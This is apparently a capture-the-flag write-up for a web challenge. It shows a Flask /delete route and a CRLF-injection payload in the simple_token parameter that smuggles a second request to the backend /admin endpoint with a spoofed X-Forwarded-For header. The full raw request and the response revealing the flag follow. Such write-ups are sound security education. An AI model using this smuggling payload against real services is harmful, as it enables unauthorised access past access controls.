My app is faulty can you get the flag?? https://smug.flag4all.sh Format du flag : flag{xxx}
app/app.py
@app.route('/delete', methods=['POST'])
def post_delete():
post_idx = request.form.get('post_idx')
print(post_idx)
if not isinstance(post_idx, str) or not post_idx.isdecimal():
abort(400)
res = curl_back(f'/posts/{post_idx}', DELETE, request.remote_addr, g.simple_token)
if res is None:
abort(400)
return render_template('/api_result.html', simple_token=g.simple_token, res=res)
Since /delete
dosent beautify the response we can use it to perform our http request smuggling on it.
We create a token and smuggle a second request to backend/admin endpoint to fetch the flag with this payload.
/delete?simple_token=b3a0608ca1966b6ed4d3409c90f98102194e232619bc4a935e0608959b7d0763%0D%0AContent-Length:%202%0d%0a%0d%0a2a%0d%0a%0d%0aGET%20/admin%20HTTP/1.1%0D%0AHost:%20127.0.0.1:8000%0D%0ASimple-Token:%20b3a0608ca1966b6ed4d3409c90f98102194e232619bc4a935e0608959b7d0763%0d%0aX-Forwarded-For:%20127.0.0.1%0d%0aContent-Length:%200%0d%0a%0d%0aGET%20/%20HTTP/1.1
After sent to curl_back() function the simple_token header will smuggle and evaluate to theses requests:
/delete?simple_token=b3a0608ca1966b6ed4d3409c90f98102194e232619bc4a935e0608959b7d0763
Content-Length: 2
2a
GET /admin HTTP/1.1
Host: 127.0.0.1:8000
Simple-Token: b3a0608ca1966b6ed4d3409c90f98102194e232619bc4a935e0608959b7d0763
X-Forwarded-For: 127.0.0.1
Content-Length: 0
GET / HTTP/1.1
...
When sending the payload to the challenge we can read the flag :
POST /delete?simple_token=b3a0608ca1966b6ed4d3409c90f98102194e232619bc4a935e0608959b7d0763%0D%0AContent-Length:%202%0d%0a%0d%0a2a%0d%0a%0d%0aGET%20/admin%20HTTP/1.1%0D%0AHost:%20127.0.0.1:8000%0D%0ASimple-Token:%20b3a0608ca1966b6ed4d3409c90f98102194e232619bc4a935e0608959b7d0763%0d%0aX-Forwarded-For:%20127.0.0.1%0d%0aContent-Length:%200%0d%0a%0d%0aGET%20/%20HTTP/1.1 HTTP/1.1
Host: smug.flag4all.sh
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 10
post_idx=0
HTTP/1.1 200
content-type: text/html; charset=utf-8
date: Sat, 21 Oct 2023 15:54:28 GMT
server: Werkzeug/3.0.0 Python/3.11.6
content-length: 943
alt-svc: h3=":443";ma=900;
set-cookie: C00ki3_st1cks=srv_8e3764354bd1f2bc478366221e074e9125382782e4de6fdc445883887a99a536; path=/
connection: close
<!DOCTYPE html>
<html>
<head>
<link rel="stylesheet" type="text/css" href="/static/css/normalize.css">
</head>
<body>
<h2>Result</h2>
<pre>
nullHTTP/1.1 200 OK
date: Sat, 21 Oct 2023 15:54:27 GMT
server: uvicorn
content-length: 54
content-type: application/json
{"message":"flag{7847560c748814fd3070e9149a9578bd}\n"}HTTP/1.1 401 Unauthorized
date: Sat, 21 Oct 2023 15:54:27 GMT
server: uvicorn
content-length: 4
content-type: application/json
null
</pre><br>
<a href="/menu?simple_token=b3a0608ca1966b6ed4d3409c90f98102194e232619bc4a935e0608959b7d0763%0D%0AContent-Length:+2%0D%0A%0D%0A2a%0D%0A%0D%0AGET+/admin+HTTP/1.1%0D%0AHost:+127.0.0.1:8000%0D%0ASimple-Token:+b3a0608ca1966b6ed4d3409c90f98102194e232619bc4a935e0608959b7d0763%0D%0AX-Forwarded-For:+127.0.0.1%0D%0AContent-Length:+0%0D%0A%0D%0AGET+/+HTTP/1.1"><button id="cancel" type="submit" form="cancel_button">Go back</button></a>
</body>
</html>